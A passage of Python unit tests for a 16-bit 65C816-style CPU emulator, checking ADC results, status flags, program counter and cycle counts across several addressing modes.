# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFF, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Absolute, Y-Indexed
def test_adc_bcd_off_abs_y_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.y = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_abs_y_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFF, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page
def test_adc_bcd_off_dp_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_dp_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.a = 0x4000
mpu.p &= ~(mpu.OVERFLOW)
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page, X-Indexed
def test_adc_bcd_off_dp_x_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_x_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_dp_x_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_x_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_x_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page Indirect, Indexed (X)
def test_adc_bcd_off_ind_indexed_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_ind_indexed_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_ind_indexed_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page, Indirect
def test_adc_bcd_off_dp_ind_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_ind_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_dp_ind_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_ind_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_ind_overflow_cleared_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_cleared_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_ind_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.a = 0x4000
# $0000 ADC ($0010)
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x72, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page Indexed, Indirect (Y)
def test_adc_bcd_off_indexed_ind_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.y = 0x03
# $0000 ADC ($0010),Y
# $0010 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x71, 0x10))
self._write(mpu.memory, 0x0010, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
